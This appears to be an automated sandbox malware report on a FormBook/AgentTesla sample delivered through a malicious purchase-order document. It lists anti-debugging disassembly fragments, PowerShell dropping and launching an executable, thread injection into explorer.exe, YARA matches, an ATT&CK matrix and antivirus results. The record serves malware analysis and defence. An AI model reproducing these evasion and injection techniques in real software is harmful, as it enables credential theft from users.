Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013449A4 mov eax, dword ptr fs:[00000030h]	28_2_013449A4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013449A4 mov eax, dword ptr fs:[00000030h]	28_2_013449A4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC9BF mov eax, dword ptr fs:[00000030h]	28_2_012BC9BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BC9BF mov eax, dword ptr fs:[00000030h]	28_2_012BC9BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov ecx, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A99BF mov eax, dword ptr fs:[00000030h]	28_2_012A99BF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013069A6 mov eax, dword ptr fs:[00000030h]	28_2_013069A6
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B99BC mov eax, dword ptr fs:[00000030h]	28_2_012B99BC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B2990 mov eax, dword ptr fs:[00000030h]	28_2_012B2990
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013589E7 mov eax, dword ptr fs:[00000030h]	28_2_013589E7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013419D8 mov eax, dword ptr fs:[00000030h]	28_2_013419D8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]	28_2_012999C7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]	28_2_012999C7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]	28_2_012999C7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012999C7 mov eax, dword ptr fs:[00000030h]	28_2_012999C7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]	28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]	28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]	28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AA830 mov eax, dword ptr fs:[00000030h]	28_2_012AA830
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800 mov eax, dword ptr fs:[00000030h]	28_2_01286800
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800 mov eax, dword ptr fs:[00000030h]	28_2_01286800
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01286800 mov eax, dword ptr fs:[00000030h]	28_2_01286800
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AF86D mov eax, dword ptr fs:[00000030h]	28_2_012AF86D
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01341843 mov eax, dword ptr fs:[00000030h]	28_2_01341843
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]	28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]	28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]	28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov ecx, dword ptr fs:[00000030h]	28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]	28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012928AE mov eax, dword ptr fs:[00000030h]	28_2_012928AE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B78A0 mov eax, dword ptr fs:[00000030h]	28_2_012B78A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283880 mov eax, dword ptr fs:[00000030h]	28_2_01283880
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283880 mov eax, dword ptr fs:[00000030h]	28_2_01283880
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01303884 mov eax, dword ptr fs:[00000030h]	28_2_01303884
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01303884 mov eax, dword ptr fs:[00000030h]	28_2_01303884

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\Public\Documents\nothinglittle.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Thread register set: target process: 3388

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\Documents\nothinglittle.exe C:\Users\Public\Documents\nothinglittle.exe			Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process created: C:\Users\user\AppData\Local\Temp\nothinglittle.exe C:\Users\user\AppData\Local\Temp\nothinglittle.exe			Jump to behavior

Source: explorer.exe, 0000001D.00000000.438472962.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001D.00000000.439042458.0000000001980000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Queries volume information: C:\Users\Public\Documents\nothinglittle.exe VolumeInformation	Jump to behavior

Source: C:\Users\Public\Documents\nothinglittle.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting22	Path Interception	Process Injection212	Masquerading1	OS Credential Dumping	Security Software Discovery331	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Exploitation for Client Execution12	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion41	Security Account Manager	Virtualization/Sandbox Evasion41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection212	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting22	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information41	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Timestomp1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Extra Window Memory Injection1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
RFL_PO 69002.doc	15%	Virustotal		Browse
RFL_PO 69002.doc	22%	ReversingLabs	Script-Macro.Downloader.EncDoc
RFL_PO 69002.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	26%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nothinglittle.exe	55%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
28.0.nothinglittle.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File
28.2.nothinglittle.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
